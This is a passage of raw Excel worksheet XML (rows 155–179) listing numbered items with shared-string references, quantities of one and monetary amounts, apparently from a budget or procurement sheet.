      <c r="S155" s="47"/>
      <c r="T155" s="47"/>
      <c r="U155" s="47"/>
      <c r="V155" s="47"/>
      <c r="W155" s="47"/>
      <c r="X155" s="47"/>
      <c r="Y155" s="47"/>
      <c r="Z155" s="47"/>
      <c r="AA155" s="47"/>
      <c r="AB155" s="47"/>
      <c r="AC155" s="47"/>
      <c r="AD155" s="47"/>
      <c r="AE155" s="47"/>
      <c r="AF155" s="47"/>
      <c r="AG155" s="47"/>
    </row>
    <row r="156" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A156" s="25"/>
      <c r="B156" s="36">
        <v>283</v>
      </c>
      <c r="C156" s="36"/>
      <c r="D156" s="63" t="s">
        <v>3899</v>
      </c>
      <c r="E156" s="63" t="s">
        <v>4498</v>
      </c>
      <c r="F156" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G156" s="26">
        <v>1</v>
      </c>
      <c r="H156" s="26"/>
      <c r="I156" s="26"/>
      <c r="J156" s="50">
        <v>10800</v>
      </c>
      <c r="L156" s="25"/>
      <c r="M156" s="25"/>
      <c r="N156" s="47"/>
      <c r="O156" s="47"/>
      <c r="P156" s="47"/>
      <c r="Q156" s="47"/>
      <c r="R156" s="47"/>
      <c r="S156" s="47"/>
      <c r="T156" s="47"/>
      <c r="U156" s="47"/>
      <c r="V156" s="47"/>
      <c r="W156" s="47"/>
      <c r="X156" s="47"/>
      <c r="Y156" s="47"/>
      <c r="Z156" s="47"/>
      <c r="AA156" s="47"/>
      <c r="AB156" s="47"/>
      <c r="AC156" s="47"/>
      <c r="AD156" s="47"/>
      <c r="AE156" s="47"/>
      <c r="AF156" s="47"/>
      <c r="AG156" s="47"/>
    </row>
    <row r="157" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A157" s="25"/>
      <c r="B157" s="36">
        <v>284</v>
      </c>
      <c r="C157" s="36"/>
      <c r="D157" s="63" t="s">
        <v>4499</v>
      </c>
      <c r="E157" s="63" t="s">
        <v>4500</v>
      </c>
      <c r="F157" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G157" s="23">
        <v>1</v>
      </c>
      <c r="H157" s="26"/>
      <c r="I157" s="26"/>
      <c r="J157" s="50">
        <v>160000</v>
      </c>
      <c r="K157" s="26"/>
      <c r="L157" s="25"/>
      <c r="M157" s="25"/>
      <c r="N157" s="47"/>
      <c r="O157" s="47"/>
      <c r="P157" s="47"/>
      <c r="Q157" s="47"/>
      <c r="R157" s="47"/>
      <c r="S157" s="47"/>
      <c r="T157" s="47"/>
      <c r="U157" s="47"/>
      <c r="V157" s="47"/>
      <c r="W157" s="47"/>
      <c r="X157" s="47"/>
      <c r="Y157" s="47"/>
      <c r="Z157" s="47"/>
      <c r="AA157" s="47"/>
      <c r="AB157" s="47"/>
      <c r="AC157" s="47"/>
      <c r="AD157" s="47"/>
      <c r="AE157" s="47"/>
      <c r="AF157" s="47"/>
      <c r="AG157" s="47"/>
    </row>
    <row r="158" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A158" s="25"/>
      <c r="B158" s="74" t="s">
        <v>4501</v>
      </c>
      <c r="C158" s="74"/>
      <c r="D158" s="74"/>
      <c r="E158" s="74"/>
      <c r="F158" s="36"/>
      <c r="G158" s="26"/>
      <c r="H158" s="26"/>
      <c r="I158" s="26"/>
      <c r="J158" s="50">
        <v>0</v>
      </c>
      <c r="K158" s="26"/>
      <c r="L158" s="25"/>
      <c r="M158" s="25"/>
      <c r="N158" s="47"/>
      <c r="O158" s="47"/>
      <c r="P158" s="47"/>
      <c r="Q158" s="47"/>
      <c r="R158" s="47"/>
      <c r="S158" s="47"/>
      <c r="T158" s="47"/>
      <c r="U158" s="47"/>
      <c r="V158" s="47"/>
      <c r="W158" s="47"/>
      <c r="X158" s="47"/>
      <c r="Y158" s="47"/>
      <c r="Z158" s="47"/>
      <c r="AA158" s="47"/>
      <c r="AB158" s="47"/>
      <c r="AC158" s="47"/>
      <c r="AD158" s="47"/>
      <c r="AE158" s="47"/>
      <c r="AF158" s="47"/>
      <c r="AG158" s="47"/>
    </row>
    <row r="159" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A159" s="25"/>
      <c r="B159" s="36">
        <v>285</v>
      </c>
      <c r="C159" s="36"/>
      <c r="D159" s="63" t="s">
        <v>4502</v>
      </c>
      <c r="E159" s="63" t="s">
        <v>4503</v>
      </c>
      <c r="F159" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G159" s="26">
        <v>1</v>
      </c>
      <c r="H159" s="26"/>
      <c r="I159" s="26"/>
      <c r="J159" s="50">
        <v>320</v>
      </c>
      <c r="K159" s="26"/>
      <c r="L159" s="25"/>
      <c r="M159" s="25"/>
      <c r="N159" s="47"/>
      <c r="O159" s="47"/>
      <c r="P159" s="47"/>
      <c r="Q159" s="47"/>
      <c r="R159" s="47"/>
      <c r="S159" s="47"/>
      <c r="T159" s="47"/>
      <c r="U159" s="47"/>
      <c r="V159" s="47"/>
      <c r="W159" s="47"/>
      <c r="X159" s="47"/>
      <c r="Y159" s="47"/>
      <c r="Z159" s="47"/>
      <c r="AA159" s="47"/>
      <c r="AB159" s="47"/>
      <c r="AC159" s="47"/>
      <c r="AD159" s="47"/>
      <c r="AE159" s="47"/>
      <c r="AF159" s="47"/>
      <c r="AG159" s="47"/>
    </row>
    <row r="160" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A160" s="25"/>
      <c r="B160" s="36">
        <v>286</v>
      </c>
      <c r="C160" s="36"/>
      <c r="D160" s="63" t="s">
        <v>4504</v>
      </c>
      <c r="E160" s="63" t="s">
        <v>4505</v>
      </c>
      <c r="F160" s="36" t="s">
        <v>3776</v>
      </c>
      <c r="G160" s="26">
        <v>1</v>
      </c>
      <c r="H160" s="26"/>
      <c r="I160" s="26"/>
      <c r="J160" s="50">
        <v>160</v>
      </c>
      <c r="K160" s="26"/>
      <c r="L160" s="25"/>
      <c r="M160" s="25"/>
      <c r="N160" s="47"/>
      <c r="O160" s="47"/>
      <c r="P160" s="47"/>
      <c r="Q160" s="47"/>
      <c r="R160" s="47"/>
      <c r="S160" s="47"/>
      <c r="T160" s="47"/>
      <c r="U160" s="47"/>
      <c r="V160" s="47"/>
      <c r="W160" s="47"/>
      <c r="X160" s="47"/>
      <c r="Y160" s="47"/>
      <c r="Z160" s="47"/>
      <c r="AA160" s="47"/>
      <c r="AB160" s="47"/>
      <c r="AC160" s="47"/>
      <c r="AD160" s="47"/>
      <c r="AE160" s="47"/>
      <c r="AF160" s="47"/>
      <c r="AG160" s="47"/>
    </row>
    <row r="161" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A161" s="25"/>
      <c r="B161" s="36">
        <v>287</v>
      </c>
      <c r="C161" s="36"/>
      <c r="D161" s="66" t="s">
        <v>4506</v>
      </c>
      <c r="E161" s="66" t="s">
        <v>4503</v>
      </c>
      <c r="F161" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G161" s="26">
        <v>1</v>
      </c>
      <c r="H161" s="36"/>
      <c r="I161" s="76"/>
      <c r="J161" s="50">
        <v>120</v>
      </c>
      <c r="K161" s="26"/>
      <c r="L161" s="25"/>
      <c r="M161" s="25"/>
      <c r="N161" s="47"/>
      <c r="O161" s="47"/>
      <c r="P161" s="47"/>
      <c r="Q161" s="47"/>
      <c r="R161" s="47"/>
      <c r="S161" s="47"/>
      <c r="T161" s="47"/>
      <c r="U161" s="47"/>
      <c r="V161" s="47"/>
      <c r="W161" s="47"/>
      <c r="X161" s="47"/>
      <c r="Y161" s="47"/>
      <c r="Z161" s="47"/>
      <c r="AA161" s="47"/>
      <c r="AB161" s="47"/>
      <c r="AC161" s="47"/>
      <c r="AD161" s="47"/>
      <c r="AE161" s="47"/>
      <c r="AF161" s="47"/>
      <c r="AG161" s="47"/>
    </row>
    <row r="162" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A162" s="25"/>
      <c r="B162" s="36">
        <v>288</v>
      </c>
      <c r="C162" s="36"/>
      <c r="D162" s="63" t="s">
        <v>798</v>
      </c>
      <c r="E162" s="63" t="s">
        <v>4507</v>
      </c>
      <c r="F162" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G162" s="26">
        <v>1</v>
      </c>
      <c r="H162" s="26"/>
      <c r="I162" s="75"/>
      <c r="J162" s="50">
        <v>4000</v>
      </c>
      <c r="L162" s="25"/>
      <c r="M162" s="25"/>
      <c r="N162" s="47"/>
      <c r="O162" s="47"/>
      <c r="P162" s="47"/>
      <c r="Q162" s="47"/>
      <c r="R162" s="47"/>
      <c r="S162" s="47"/>
      <c r="T162" s="47"/>
      <c r="U162" s="47"/>
      <c r="V162" s="47"/>
      <c r="W162" s="47"/>
      <c r="X162" s="47"/>
      <c r="Y162" s="47"/>
      <c r="Z162" s="47"/>
      <c r="AA162" s="47"/>
      <c r="AB162" s="47"/>
      <c r="AC162" s="47"/>
      <c r="AD162" s="47"/>
      <c r="AE162" s="47"/>
      <c r="AF162" s="47"/>
      <c r="AG162" s="47"/>
    </row>
    <row r="163" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A163" s="25"/>
      <c r="B163" s="36">
        <v>289</v>
      </c>
      <c r="C163" s="36"/>
      <c r="D163" s="63" t="s">
        <v>798</v>
      </c>
      <c r="E163" s="63" t="s">
        <v>4508</v>
      </c>
      <c r="F163" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G163" s="26">
        <v>1</v>
      </c>
      <c r="H163" s="26"/>
      <c r="I163" s="75"/>
      <c r="J163" s="50">
        <v>2000</v>
      </c>
      <c r="L163" s="25"/>
      <c r="M163" s="25"/>
      <c r="N163" s="47"/>
      <c r="O163" s="47"/>
      <c r="P163" s="47"/>
      <c r="Q163" s="47"/>
      <c r="R163" s="47"/>
      <c r="S163" s="47"/>
      <c r="T163" s="47"/>
      <c r="U163" s="47"/>
      <c r="V163" s="47"/>
      <c r="W163" s="47"/>
      <c r="X163" s="47"/>
      <c r="Y163" s="47"/>
      <c r="Z163" s="47"/>
      <c r="AA163" s="47"/>
      <c r="AB163" s="47"/>
      <c r="AC163" s="47"/>
      <c r="AD163" s="47"/>
      <c r="AE163" s="47"/>
      <c r="AF163" s="47"/>
      <c r="AG163" s="47"/>
    </row>
    <row r="164" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A164" s="25"/>
      <c r="B164" s="36">
        <v>290</v>
      </c>
      <c r="C164" s="36"/>
      <c r="D164" s="63" t="s">
        <v>1324</v>
      </c>
      <c r="E164" s="63" t="s">
        <v>4509</v>
      </c>
      <c r="F164" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G164" s="26">
        <v>1</v>
      </c>
      <c r="H164" s="26"/>
      <c r="I164" s="75"/>
      <c r="J164" s="50">
        <v>320</v>
      </c>
      <c r="L164" s="25"/>
      <c r="M164" s="25"/>
      <c r="N164" s="47"/>
      <c r="O164" s="47"/>
      <c r="P164" s="47"/>
      <c r="Q164" s="47"/>
      <c r="R164" s="47"/>
      <c r="S164" s="47"/>
      <c r="T164" s="47"/>
      <c r="U164" s="47"/>
      <c r="V164" s="47"/>
      <c r="W164" s="47"/>
      <c r="X164" s="47"/>
      <c r="Y164" s="47"/>
      <c r="Z164" s="47"/>
      <c r="AA164" s="47"/>
      <c r="AB164" s="47"/>
      <c r="AC164" s="47"/>
      <c r="AD164" s="47"/>
      <c r="AE164" s="47"/>
      <c r="AF164" s="47"/>
      <c r="AG164" s="47"/>
    </row>
    <row r="165" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A165" s="25"/>
      <c r="B165" s="36">
        <v>291</v>
      </c>
      <c r="C165" s="36"/>
      <c r="D165" s="63" t="s">
        <v>1324</v>
      </c>
      <c r="E165" s="63" t="s">
        <v>4510</v>
      </c>
      <c r="F165" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G165" s="26">
        <v>1</v>
      </c>
      <c r="H165" s="26"/>
      <c r="I165" s="26"/>
      <c r="J165" s="50">
        <v>240</v>
      </c>
      <c r="L165" s="25"/>
      <c r="M165" s="25"/>
      <c r="N165" s="47"/>
      <c r="O165" s="47"/>
      <c r="P165" s="47"/>
      <c r="Q165" s="47"/>
      <c r="R165" s="47"/>
      <c r="S165" s="47"/>
      <c r="T165" s="47"/>
      <c r="U165" s="47"/>
      <c r="V165" s="47"/>
      <c r="W165" s="47"/>
      <c r="X165" s="47"/>
      <c r="Y165" s="47"/>
      <c r="Z165" s="47"/>
      <c r="AA165" s="47"/>
      <c r="AB165" s="47"/>
      <c r="AC165" s="47"/>
      <c r="AD165" s="47"/>
      <c r="AE165" s="47"/>
      <c r="AF165" s="47"/>
      <c r="AG165" s="47"/>
    </row>
    <row r="166" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A166" s="25"/>
      <c r="B166" s="36">
        <v>292</v>
      </c>
      <c r="C166" s="36"/>
      <c r="D166" s="63" t="s">
        <v>4511</v>
      </c>
      <c r="E166" s="63" t="s">
        <v>4512</v>
      </c>
      <c r="F166" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G166" s="26">
        <v>1</v>
      </c>
      <c r="H166" s="26"/>
      <c r="I166" s="26"/>
      <c r="J166" s="50">
        <v>160</v>
      </c>
      <c r="L166" s="25"/>
      <c r="M166" s="25"/>
      <c r="N166" s="47"/>
      <c r="O166" s="47"/>
      <c r="P166" s="47"/>
      <c r="Q166" s="47"/>
      <c r="R166" s="47"/>
      <c r="S166" s="47"/>
      <c r="T166" s="47"/>
      <c r="U166" s="47"/>
      <c r="V166" s="47"/>
      <c r="W166" s="47"/>
      <c r="X166" s="47"/>
      <c r="Y166" s="47"/>
      <c r="Z166" s="47"/>
      <c r="AA166" s="47"/>
      <c r="AB166" s="47"/>
      <c r="AC166" s="47"/>
      <c r="AD166" s="47"/>
      <c r="AE166" s="47"/>
      <c r="AF166" s="47"/>
      <c r="AG166" s="47"/>
    </row>
    <row r="167" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A167" s="25"/>
      <c r="B167" s="36">
        <v>293</v>
      </c>
      <c r="C167" s="36"/>
      <c r="D167" s="63" t="s">
        <v>4513</v>
      </c>
      <c r="E167" s="63" t="s">
        <v>4514</v>
      </c>
      <c r="F167" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G167" s="26">
        <v>1</v>
      </c>
      <c r="H167" s="26"/>
      <c r="I167" s="26"/>
      <c r="J167" s="50">
        <v>6400</v>
      </c>
      <c r="L167" s="25"/>
      <c r="M167" s="25"/>
      <c r="N167" s="47"/>
      <c r="O167" s="47"/>
      <c r="P167" s="47"/>
      <c r="Q167" s="47"/>
      <c r="R167" s="47"/>
      <c r="S167" s="47"/>
      <c r="T167" s="47"/>
      <c r="U167" s="47"/>
      <c r="V167" s="47"/>
      <c r="W167" s="47"/>
      <c r="X167" s="47"/>
      <c r="Y167" s="47"/>
      <c r="Z167" s="47"/>
      <c r="AA167" s="47"/>
      <c r="AB167" s="47"/>
      <c r="AC167" s="47"/>
      <c r="AD167" s="47"/>
      <c r="AE167" s="47"/>
      <c r="AF167" s="47"/>
      <c r="AG167" s="47"/>
    </row>
    <row r="168" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A168" s="25"/>
      <c r="B168" s="36">
        <v>294</v>
      </c>
      <c r="C168" s="36"/>
      <c r="D168" s="63" t="s">
        <v>3807</v>
      </c>
      <c r="E168" s="63" t="s">
        <v>4515</v>
      </c>
      <c r="F168" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G168" s="26">
        <v>1</v>
      </c>
      <c r="H168" s="26"/>
      <c r="I168" s="26"/>
      <c r="J168" s="50">
        <v>32</v>
      </c>
      <c r="L168" s="25"/>
      <c r="M168" s="25"/>
      <c r="N168" s="47"/>
      <c r="O168" s="47"/>
      <c r="P168" s="47"/>
      <c r="Q168" s="47"/>
      <c r="R168" s="47"/>
      <c r="S168" s="47"/>
      <c r="T168" s="47"/>
      <c r="U168" s="47"/>
      <c r="V168" s="47"/>
      <c r="W168" s="47"/>
      <c r="X168" s="47"/>
      <c r="Y168" s="47"/>
      <c r="Z168" s="47"/>
      <c r="AA168" s="47"/>
      <c r="AB168" s="47"/>
      <c r="AC168" s="47"/>
      <c r="AD168" s="47"/>
      <c r="AE168" s="47"/>
      <c r="AF168" s="47"/>
      <c r="AG168" s="47"/>
    </row>
    <row r="169" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A169" s="25"/>
      <c r="B169" s="36">
        <v>295</v>
      </c>
      <c r="C169" s="36"/>
      <c r="D169" s="63" t="s">
        <v>4516</v>
      </c>
      <c r="E169" s="63" t="s">
        <v>4517</v>
      </c>
      <c r="F169" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G169" s="26">
        <v>1</v>
      </c>
      <c r="H169" s="26"/>
      <c r="I169" s="26"/>
      <c r="J169" s="50">
        <v>480</v>
      </c>
      <c r="L169" s="25"/>
      <c r="M169" s="25"/>
      <c r="N169" s="47"/>
      <c r="O169" s="47"/>
      <c r="P169" s="47"/>
      <c r="Q169" s="47"/>
      <c r="R169" s="47"/>
      <c r="S169" s="47"/>
      <c r="T169" s="47"/>
      <c r="U169" s="47"/>
      <c r="V169" s="47"/>
      <c r="W169" s="47"/>
      <c r="X169" s="47"/>
      <c r="Y169" s="47"/>
      <c r="Z169" s="47"/>
      <c r="AA169" s="47"/>
      <c r="AB169" s="47"/>
      <c r="AC169" s="47"/>
      <c r="AD169" s="47"/>
      <c r="AE169" s="47"/>
      <c r="AF169" s="47"/>
      <c r="AG169" s="47"/>
    </row>
    <row r="170" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A170" s="25"/>
      <c r="B170" s="36">
        <v>296</v>
      </c>
      <c r="C170" s="36"/>
      <c r="D170" s="63" t="s">
        <v>4518</v>
      </c>
      <c r="E170" s="63"/>
      <c r="F170" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G170" s="26">
        <v>1</v>
      </c>
      <c r="H170" s="26"/>
      <c r="I170" s="26"/>
      <c r="J170" s="50">
        <v>800</v>
      </c>
      <c r="K170" s="26"/>
      <c r="L170" s="25"/>
      <c r="M170" s="25"/>
      <c r="N170" s="47"/>
      <c r="O170" s="47"/>
      <c r="P170" s="47"/>
      <c r="Q170" s="47"/>
      <c r="R170" s="47"/>
      <c r="S170" s="47"/>
      <c r="T170" s="47"/>
      <c r="U170" s="47"/>
      <c r="V170" s="47"/>
      <c r="W170" s="47"/>
      <c r="X170" s="47"/>
      <c r="Y170" s="47"/>
      <c r="Z170" s="47"/>
      <c r="AA170" s="47"/>
      <c r="AB170" s="47"/>
      <c r="AC170" s="47"/>
      <c r="AD170" s="47"/>
      <c r="AE170" s="47"/>
      <c r="AF170" s="47"/>
      <c r="AG170" s="47"/>
    </row>
    <row r="171" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A171" s="25"/>
      <c r="B171" s="36">
        <v>297</v>
      </c>
      <c r="C171" s="36"/>
      <c r="D171" s="63" t="s">
        <v>334</v>
      </c>
      <c r="E171" s="63" t="s">
        <v>4519</v>
      </c>
      <c r="F171" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G171" s="26">
        <v>1</v>
      </c>
      <c r="H171" s="26"/>
      <c r="I171" s="26"/>
      <c r="J171" s="50">
        <v>400</v>
      </c>
      <c r="K171" s="26"/>
      <c r="L171" s="25"/>
      <c r="M171" s="25"/>
      <c r="N171" s="47"/>
      <c r="O171" s="47"/>
      <c r="P171" s="47"/>
      <c r="Q171" s="47"/>
      <c r="R171" s="47"/>
      <c r="S171" s="47"/>
      <c r="T171" s="47"/>
      <c r="U171" s="47"/>
      <c r="V171" s="47"/>
      <c r="W171" s="47"/>
      <c r="X171" s="47"/>
      <c r="Y171" s="47"/>
      <c r="Z171" s="47"/>
      <c r="AA171" s="47"/>
      <c r="AB171" s="47"/>
      <c r="AC171" s="47"/>
      <c r="AD171" s="47"/>
      <c r="AE171" s="47"/>
      <c r="AF171" s="47"/>
      <c r="AG171" s="47"/>
    </row>
    <row r="172" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A172" s="25"/>
      <c r="B172" s="36">
        <v>298</v>
      </c>
      <c r="C172" s="36"/>
      <c r="D172" s="63" t="s">
        <v>3683</v>
      </c>
      <c r="E172" s="63" t="s">
        <v>4520</v>
      </c>
      <c r="F172" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G172" s="26">
        <v>1</v>
      </c>
      <c r="H172" s="26"/>
      <c r="I172" s="26"/>
      <c r="J172" s="50">
        <v>640</v>
      </c>
      <c r="K172" s="26"/>
      <c r="L172" s="25"/>
      <c r="M172" s="25"/>
      <c r="N172" s="47"/>
      <c r="O172" s="47"/>
      <c r="P172" s="47"/>
      <c r="Q172" s="47"/>
      <c r="R172" s="47"/>
      <c r="S172" s="47"/>
      <c r="T172" s="47"/>
      <c r="U172" s="47"/>
      <c r="V172" s="47"/>
      <c r="W172" s="47"/>
      <c r="X172" s="47"/>
      <c r="Y172" s="47"/>
      <c r="Z172" s="47"/>
      <c r="AA172" s="47"/>
      <c r="AB172" s="47"/>
      <c r="AC172" s="47"/>
      <c r="AD172" s="47"/>
      <c r="AE172" s="47"/>
      <c r="AF172" s="47"/>
      <c r="AG172" s="47"/>
    </row>
    <row r="173" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A173" s="25"/>
      <c r="B173" s="36">
        <v>299</v>
      </c>
      <c r="C173" s="36"/>
      <c r="D173" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E173" s="63" t="s">
        <v>2528</v>
      </c>
      <c r="F173" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G173" s="26">
        <v>1</v>
      </c>
      <c r="H173" s="26"/>
      <c r="I173" s="26"/>
      <c r="J173" s="50">
        <v>1200</v>
      </c>
      <c r="K173" s="26"/>
      <c r="L173" s="25"/>
      <c r="M173" s="25"/>
      <c r="N173" s="47"/>
      <c r="O173" s="47"/>
      <c r="P173" s="47"/>
      <c r="Q173" s="47"/>
      <c r="R173" s="47"/>
      <c r="S173" s="47"/>
      <c r="T173" s="47"/>
      <c r="U173" s="47"/>
      <c r="V173" s="47"/>
      <c r="W173" s="47"/>
      <c r="X173" s="47"/>
      <c r="Y173" s="47"/>
      <c r="Z173" s="47"/>
      <c r="AA173" s="47"/>
      <c r="AB173" s="47"/>
      <c r="AC173" s="47"/>
      <c r="AD173" s="47"/>
      <c r="AE173" s="47"/>
      <c r="AF173" s="47"/>
      <c r="AG173" s="47"/>
    </row>
    <row r="174" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A174" s="25"/>
      <c r="B174" s="36">
        <v>300</v>
      </c>
      <c r="C174" s="36"/>
      <c r="D174" s="63" t="s">
        <v>4521</v>
      </c>
      <c r="E174" s="63" t="s">
        <v>4497</v>
      </c>
      <c r="F174" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G174" s="26">
        <v>1</v>
      </c>
      <c r="H174" s="26"/>
      <c r="I174" s="75"/>
      <c r="J174" s="50">
        <v>8000</v>
      </c>
      <c r="L174" s="25"/>
      <c r="M174" s="25"/>
      <c r="N174" s="47"/>
      <c r="O174" s="47"/>
      <c r="P174" s="47"/>
      <c r="Q174" s="47"/>
      <c r="R174" s="47"/>
      <c r="S174" s="47"/>
      <c r="T174" s="47"/>
      <c r="U174" s="47"/>
      <c r="V174" s="47"/>
      <c r="W174" s="47"/>
      <c r="X174" s="47"/>
      <c r="Y174" s="47"/>
      <c r="Z174" s="47"/>
      <c r="AA174" s="47"/>
      <c r="AB174" s="47"/>
      <c r="AC174" s="47"/>
      <c r="AD174" s="47"/>
      <c r="AE174" s="47"/>
      <c r="AF174" s="47"/>
      <c r="AG174" s="47"/>
    </row>
    <row r="175" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A175" s="25"/>
      <c r="B175" s="36">
        <v>301</v>
      </c>
      <c r="C175" s="36"/>
      <c r="D175" s="63" t="s">
        <v>2430</v>
      </c>
      <c r="E175" s="63" t="s">
        <v>4503</v>
      </c>
      <c r="F175" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G175" s="26">
        <v>1</v>
      </c>
      <c r="H175" s="26"/>
      <c r="I175" s="75"/>
      <c r="J175" s="50">
        <v>4000</v>
      </c>
      <c r="L175" s="25"/>
      <c r="M175" s="25"/>
      <c r="N175" s="47"/>
      <c r="O175" s="47"/>
      <c r="P175" s="47"/>
      <c r="Q175" s="47"/>
      <c r="R175" s="47"/>
      <c r="S175" s="47"/>
      <c r="T175" s="47"/>
      <c r="U175" s="47"/>
      <c r="V175" s="47"/>
      <c r="W175" s="47"/>
      <c r="X175" s="47"/>
      <c r="Y175" s="47"/>
      <c r="Z175" s="47"/>
      <c r="AA175" s="47"/>
      <c r="AB175" s="47"/>
      <c r="AC175" s="47"/>
      <c r="AD175" s="47"/>
      <c r="AE175" s="47"/>
      <c r="AF175" s="47"/>
      <c r="AG175" s="47"/>
    </row>
    <row r="176" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A176" s="25"/>
      <c r="B176" s="36">
        <v>302</v>
      </c>
      <c r="C176" s="36"/>
      <c r="D176" s="63" t="s">
        <v>1092</v>
      </c>
      <c r="E176" s="63" t="s">
        <v>4517</v>
      </c>
      <c r="F176" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G176" s="26">
        <v>1</v>
      </c>
      <c r="H176" s="26"/>
      <c r="I176" s="75"/>
      <c r="J176" s="50">
        <v>480</v>
      </c>
      <c r="L176" s="25"/>
      <c r="M176" s="25"/>
      <c r="N176" s="47"/>
      <c r="O176" s="47"/>
      <c r="P176" s="47"/>
      <c r="Q176" s="47"/>
      <c r="R176" s="47"/>
      <c r="S176" s="47"/>
      <c r="T176" s="47"/>
      <c r="U176" s="47"/>
      <c r="V176" s="47"/>
      <c r="W176" s="47"/>
      <c r="X176" s="47"/>
      <c r="Y176" s="47"/>
      <c r="Z176" s="47"/>
      <c r="AA176" s="47"/>
      <c r="AB176" s="47"/>
      <c r="AC176" s="47"/>
      <c r="AD176" s="47"/>
      <c r="AE176" s="47"/>
      <c r="AF176" s="47"/>
      <c r="AG176" s="47"/>
    </row>
    <row r="177" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A177" s="25"/>
      <c r="B177" s="36">
        <v>303</v>
      </c>
      <c r="C177" s="36"/>
      <c r="D177" s="63" t="s">
        <v>4522</v>
      </c>
      <c r="E177" s="63" t="s">
        <v>4523</v>
      </c>
      <c r="F177" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G177" s="26">
        <v>1</v>
      </c>
      <c r="H177" s="26"/>
      <c r="I177" s="26"/>
      <c r="J177" s="50">
        <v>19200</v>
      </c>
      <c r="K177" s="26" t="s">
        <v>4524</v>
      </c>
      <c r="L177" s="25"/>
      <c r="M177" s="25"/>
      <c r="N177" s="47"/>
      <c r="O177" s="47"/>
      <c r="P177" s="47"/>
      <c r="Q177" s="47"/>
      <c r="R177" s="47"/>
      <c r="S177" s="47"/>
      <c r="T177" s="47"/>
      <c r="U177" s="47"/>
      <c r="V177" s="47"/>
      <c r="W177" s="47"/>
      <c r="X177" s="47"/>
      <c r="Y177" s="47"/>
      <c r="Z177" s="47"/>
      <c r="AA177" s="47"/>
      <c r="AB177" s="47"/>
      <c r="AC177" s="47"/>
      <c r="AD177" s="47"/>
      <c r="AE177" s="47"/>
      <c r="AF177" s="47"/>
      <c r="AG177" s="47"/>
    </row>
    <row r="178" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A178" s="25"/>
      <c r="B178" s="36">
        <v>304</v>
      </c>
      <c r="C178" s="36"/>
      <c r="D178" s="63" t="s">
        <v>4525</v>
      </c>
      <c r="E178" s="63" t="s">
        <v>1266</v>
      </c>
      <c r="F178" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G178" s="26">
        <v>1</v>
      </c>
      <c r="H178" s="26"/>
      <c r="I178" s="26"/>
      <c r="J178" s="50">
        <v>1600</v>
      </c>
      <c r="L178" s="25"/>
      <c r="M178" s="25"/>
      <c r="N178" s="47"/>
      <c r="O178" s="47"/>
      <c r="P178" s="47"/>
      <c r="Q178" s="47"/>
      <c r="R178" s="47"/>
      <c r="S178" s="47"/>
      <c r="T178" s="47"/>
      <c r="U178" s="47"/>
      <c r="V178" s="47"/>
      <c r="W178" s="47"/>
      <c r="X178" s="47"/>
      <c r="Y178" s="47"/>
      <c r="Z178" s="47"/>
      <c r="AA178" s="47"/>
      <c r="AB178" s="47"/>
      <c r="AC178" s="47"/>
      <c r="AD178" s="47"/>
      <c r="AE178" s="47"/>
      <c r="AF178" s="47"/>
      <c r="AG178" s="47"/>
    </row>
    <row r="179" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A179" s="25"/>
      <c r="B179" s="74" t="s">
        <v>4526</v>
      </c>
      <c r="C179" s="74"/>
      <c r="D179" s="74"/>
      <c r="E179" s="74"/>
      <c r="F179" s="36"/>
      <c r="G179" s="26"/>
      <c r="H179" s="26"/>
      <c r="I179" s="26"/>
      <c r="J179" s="50">
        <v>0</v>
      </c>
      <c r="L179" s="25"/>
      <c r="M179" s="25"/>
      <c r="N179" s="47"/>
      <c r="O179" s="47"/>
      <c r="P179" s="47"/>
      <c r="Q179" s="47"/>
      <c r="R179" s="47"/>
      <c r="S179" s="47"/>
      <c r="T179" s="47"/>
      <c r="U179" s="47"/>
      <c r="V179" s="47"/>
      <c r="W179" s="47"/>
      <c r="X179" s="47"/>
      <c r="Y179" s="47"/>
      <c r="Z179" s="47"/>
      <c r="AA179" s="47"/>
      <c r="AB179" s="47"/>
      <c r="AC179" s="47"/>
      <c r="AD179" s="47"/>
      <c r="AE179" s="47"/>
      <c r="AF179" s="47"/>
